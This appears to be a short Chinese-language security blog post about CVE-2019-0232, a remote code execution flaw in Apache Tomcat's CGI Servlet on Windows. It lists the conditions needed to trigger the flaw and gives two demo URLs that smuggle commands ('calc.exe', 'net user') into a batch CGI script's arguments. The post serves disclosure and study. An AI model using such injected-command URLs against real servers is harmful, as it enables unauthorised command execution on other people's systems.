Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

CVE-2019-0232 Apache Tomcat Remote Code Execution

wpadmin~April 18, 2019 /InfoSec

Contents

CVE-2019-0232 Apache Tomcat RCE 远程代码执行(条件苛刻)

CVE-2019-0232 Apache Tomcat RCE 远程代码执行(条件苛刻)

基本信息

Apache releases #security important updates to patch a new Remote Code Execution flaw (CVE-2019-0232) in Apache Tomcat

https://thehackernews.com/2019/04/apache-tomcat-security-flaw.html

https://github.com/pyn3rd/CVE-2019-0232

exploit demo

http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Ccalc.exe
http://localhost:8080/cgi-bin/hello.bat?&net+user

漏洞触发条件

条件苛刻

1 服务器系统为 Windows
2 启用了 CGI Servlet (默认为关闭)
3 启用了 enableCmdLineArguments ( Tomcat 9.0.* 版本及官方未来发布版本默认为关闭)

tomcat_cgi

参考资料

1 少宇
2 pyn3rd
https://github.com/pyn3rd/CVE-2019-0232

Leave a Reply

Your email address will not be published. Required fields are marked *